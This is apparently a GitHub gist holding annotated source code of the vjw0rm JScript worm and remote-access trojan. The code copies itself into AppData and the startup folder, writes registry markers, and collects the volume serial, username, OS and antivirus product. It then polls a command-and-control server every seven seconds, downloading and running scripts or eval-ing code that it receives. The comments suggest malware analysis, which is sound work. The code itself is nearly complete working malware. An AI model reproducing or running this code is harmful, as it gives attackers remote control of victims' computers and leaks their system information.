vjw0rm
var j = [ | |
'WScript.Shell', | |
'Scripting.FileSystemObject', | |
'Shell.Application', | |
'Microsoft.XMLHTTP' | |
]; | |
var g = [ | |
'HKCU', | |
'HKLM', | |
'HKCU\\vjw0rm', | |
'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\', | |
'HKLM\\SOFTWARE\\Classes\\', | |
'REG_SZ', | |
'\\defaulticon\\' | |
]; | |
var y = [ | |
'winmgmts:', | |
'win32_logicaldisk', | |
'Win32_OperatingSystem', | |
'AntiVirusProduct' | |
]; | |
var sh = Cr(0); //'WScript.Shell' | |
var fs = Cr(1); //'Scripting.FileSystemObject' | |
var spl = '|V|'; //command and control delimiter | |
var Ch = '\\'; | |
var VN = 'vjw0rm' + '_' + Ob(6); // bot ID - Ob(6) - Volume serial number | |
var fu = WScript.ScriptFullName; // script fullname | |
var wn = WScript.ScriptName; // script name | |
var U; | |
try { // attempts to create HKCU\\vjw0rm registry | |
U = sh.RegRead(g[2]); | |
} catch (err) { | |
var sv = fu.split('\\'); | |
if (':\\' + sv[1] == ':\\' + wn) { // if first layer directory == to script name | |
U = 'TRUE'; | |
sh.RegWrite(g[2], U, g[5]); //then set REG_SZ TRUE | |
} else { | |
U = 'FALSE'; | |
sh.RegWrite(g[2], U, g[5]); //then set REG_SZ FALSE | |
} | |
} | |
Ns(); // Install malware | |
do { // | |
try { | |
var P = Pt('Vre', ''); // send POST request to the command and control server | |
P = P.split(spl); // get command from the control server | |
if (P[0] === 'Cl') { // Cl = Close Bot script | |
WScript.Quit(1); | |
} | |
if (P[0] === 'Sc') { // Sc = Save script file to %temp% and run | |
var s2 = Ex('temp') + '\\' + P[2]; | |
var fi = fs.CreateTextFile(s2, true); | |
fi.Write(P[1]); | |
fi.Close(); | |
sh.run(s2); | |
} | |
if (P[0] === 'Ex') { // Ex = execute script using Eval | |
eval(P[1]); | |
} | |
if (P[0] === 'Rn') { // Rn = rename bot | |
var ri = fs.OpenTextFile(fu, 1); | |
var fr = ri.ReadAll(); | |
ri.Close(); | |
VN = VN.split('_'); | |
fr = fr.replace(VN[0], P[1]); | |
var wi = fs.OpenTextFile(fu, 2, false); | |
wi.Write(fr); | |
wi.Close(); | |
sh.run('wscript.exe //B "' + fu + '"'); | |
WScript.Quit(1); | |
} | |
if (P[0] === 'Up') { //Up = update bot | |
var s2 = Ex('temp') + '\\' + P[2]; | |
var ctf = fs.CreateTextFile(s2, true); | |
var gu = P[1]; | |
gu = gu.replace('|U|', '|V|'); | |
ctf.Write(gu); | |
ctf.Close(); | |
sh.run('wscript.exe //B "' + s2 + '"', 6); | |
WScript.Quit(1); | |
} | |
if (P[0] === 'Un') { // Un = uninstall bot | |
var s2 = P[1]; | |
var vdr = Ex('Temp') + Ch + wn; | |
var regi = 'Nothing!'; | |
s2 = s2.replace('%f', fu).replace('%n', wn).replace('%sfdr', vdr).replace('%RgNe%', regi); | |
eval(s2); | |
WScript.Quit(1); | |
} | |
if (P[0] === 'RF') { // RF = same as Sc | |
var s2 = Ex('temp') + '\\' + P[2]; | |
var fi = fs.CreateTextFile(s2, true); | |
fi.Write(P[1]); | |
fi.Close(); | |
sh.run(s2); | |
} | |
} catch (err) { | |
} | |
WScript.Sleep(7000); // phone home every 7 seconds | |
} while (true); | |
function Ex(S) { | |
return sh.ExpandEnvironmentStrings('%' + S + '%'); | |
} | |
function Pt(C, A) { // send POST request to command and control | |
var X = Cr(3); | |
X.open('POST', '<control server>' + C, false); | |
X.SetRequestHeader('User-Agent:', nf()); // user agent = is the system information with the format: vjw0rm_<volume serial number>\<Username>\<OS name>\<AV product installed>\<VBC.exe installed - boolean>\<HKCU\\vjw0rm value> | |
X.send(A); | |
return X.responsetext; | |
} | |
function nf() { // get system information | |
var s, NT, i; | |
if (fs.fileexists(Ex('Windir') + '\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe')) { | |
NT = 'YES'; | |
} else { | |
NT = 'NO'; | |
} | |
//system information format: vjw0rm_<volume serial number>\<Username>\<OS name>\<AV product installed>\<VBC.exe installed - boolean>\<HKCU\\vjw0rm value> | |
s = VN + Ch + Ex('COMPUTERNAME') + Ch + Ex('USERNAME') + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch; | |
return s; | |
} | |
function Cr(N) { | |
return new ActiveXObject(j[N]); | |
} | |
function Ob(N) { | |
var s; | |
if (N == 2) { // Get operating system | |
s = GetObject(y[0]).InstancesOf(y[2]); | |
var en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
return it.Caption; | |
break; | |
} | |
} | |
if (N == 4) { // get Antivirus prodyct installed | |
var wmg = 'winmgmts:\\\\localhost\\root\\securitycenter'; | |
s = GetObject(wmg).InstancesOf(y[3]); | |
var en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
var str = it.DisplayName; | |
} | |
if (str !== '') { | |
wmg = wmg + '2'; | |
s = GetObject(wmg).InstancesOf(y[3]); //y[3] = AntiVirusProduct | |
en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
it = en.item(); | |
return it.DisplayName; | |
} | |
} else { | |
return it.DisplayName; | |
} | |
} | |
if (N == 6) { // get Volume serial number | |
s = GetObject(y[0]).InstancesOf(y[1]); | |
var en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
return it.volumeserialnumber; | |
break; | |
} | |
} | |
} | |
function Ns() { // install bot to appdata and startup folder | |
var dr = Ex('APPDATA') + Ch + wn; | |
try { | |
fs.CopyFile(fu, dr, true); | |
} catch (err) { | |
try { | |
var ap = Cr(2); | |
fs.CopyFile(fu, ap.NameSpace(7).Self.Path + '\\' + wn, true); | |
} catch (err) { | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment